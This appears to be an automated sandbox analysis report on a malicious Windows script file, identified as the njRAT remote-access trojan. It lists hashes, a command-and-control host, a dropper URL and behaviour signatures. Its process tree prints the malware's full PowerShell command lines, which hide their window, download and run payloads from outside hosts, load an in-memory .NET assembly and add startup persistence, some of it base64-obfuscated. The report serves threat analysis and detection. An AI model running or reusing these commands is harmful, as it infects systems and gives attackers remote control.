Resubmissions

10-10-2022 20:23

221010-y6fc6sdcdk 10

04-10-2022 21:00

221004-ztcl7aced4 8

Analysis

  • max time kernel
    298s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2022 20:23

General

  • Target

    0f35bfed5b1817310378a5df58ca5fcd.wsf

  • Size

    84KB

  • MD5

    0f35bfed5b1817310378a5df58ca5fcd

  • SHA1

    3062b699b4944f3e70ee80127fe760a68fb3f453

  • SHA256

    bc07c50c0b92825bf9436f7a6816bd86c54f827c00c87304b63ff67ee05e695d

  • SHA512

    c14007ae998ac0bfa7816f314e0c42919c820651e327eb67f6c182e2bd2b0aa2fdef64d6b7f7f51471e6f4903a4e632d354bed5a49ad5f411801857abfc3e9c0

  • SSDEEP

    48:4sLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLG:tiJZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://tinyurl.com/2erph6cs

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

dnsproxi2022.duckdns.org:1986

Mutex

6beb218c1e6044f785a

Attributes
  • reg_key

    6beb218c1e6044f785a

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f35bfed5b1817310378a5df58ca5fcd.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1024684238085312517/1026668711156928603/Crpted.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('El presente es el requerimiento enviado a declarar por el proceso 0091-002018-0917875 .wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\дссвПЙ.wsf');Start-Sleep 1;rm *.uue,*.pif
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
        3⤵
          PID:3636
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3124
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAC⌚⌚⌚AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAxADMAMABpAHYAbgBlAC8ANAAxADYAMwA2ADMANQA1ADAANAAwADYAOAA2ADYANgAyADAAMQAvADcAMQA1ADIAMQAzAD⌚⌚⌚AOAAwADgAMwAyADQAOAA2ADQAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3100
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = '%%';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0130ivne/4163635504068666201/7152135808324864201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'Roda' ))"
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4328
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3692

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      0ff7e1af4cc86e108eef582452b35523

      SHA1

      c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

      SHA256

      62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

      SHA512

      374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d7b5fc204bea26e27b5dad3fde21bb2f

      SHA1

      acc420ea5b24aecf437ec99ebe7002a8569833bd

      SHA256

      ebea730291a8e997962079cad97c2ee9b159f74b96ea22c49548c4b3f0da279d

      SHA512

      7c5bb43f40ae7b8c8baa6c52e6f70a17b320c90b9a36d72df979fb75dbd5c4fe1e797d40a54e21aa41e844e690e6b9fb46a09f51dc4fd0d3d9fd8f59693a1fc7

    • C:\Windows\Temp\nLeNPdi.vbs

      Filesize

      201KB

      MD5

      46306c9f94abfaca3a6409d80636075e

      SHA1

      adf4b0875ff61448d689a786066ac12f97b065dc

      SHA256

      4df9ac8599d0ff50d464df2887feea99f6c8c13105cc33c4d5554d41f5c7442b

      SHA512

      589ef5c79a272a1575d672bf60547e742f2d55181d8561f39b09517b678e0beb46abb3a1450d41e6224ea0c75bd52ab49a3e630fbb371a6e9c6d23e26b534a76

    • memory/1492-137-0x0000000000000000-mapping.dmp

    • memory/3100-147-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB

    • memory/3100-138-0x0000000000000000-mapping.dmp

    • memory/3100-140-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB

    • memory/3636-135-0x0000000000000000-mapping.dmp

    • memory/3692-150-0x0000000004F20000-0x0000000004FBC000-memory.dmp

      Filesize

      624KB

    • memory/3692-142-0x0000000000400000-0x000000000040C000-memory.dmp

      Filesize

      48KB

    • memory/3692-143-0x000000000040677E-mapping.dmp

    • memory/3692-151-0x0000000005600000-0x0000000005BA4000-memory.dmp

      Filesize

      5.6MB

    • memory/3692-152-0x0000000005170000-0x0000000005202000-memory.dmp

      Filesize

      584KB

    • memory/3692-153-0x0000000005130000-0x000000000513A000-memory.dmp

      Filesize

      40KB

    • memory/4328-144-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB

    • memory/4328-141-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB

    • memory/4328-139-0x0000000000000000-mapping.dmp

    • memory/5052-134-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB

    • memory/5052-132-0x0000000000000000-mapping.dmp

    • memory/5052-133-0x0000022C1FE00000-0x0000022C1FE22000-memory.dmp

      Filesize

      136KB

    • memory/5052-149-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

      Filesize

      10.8MB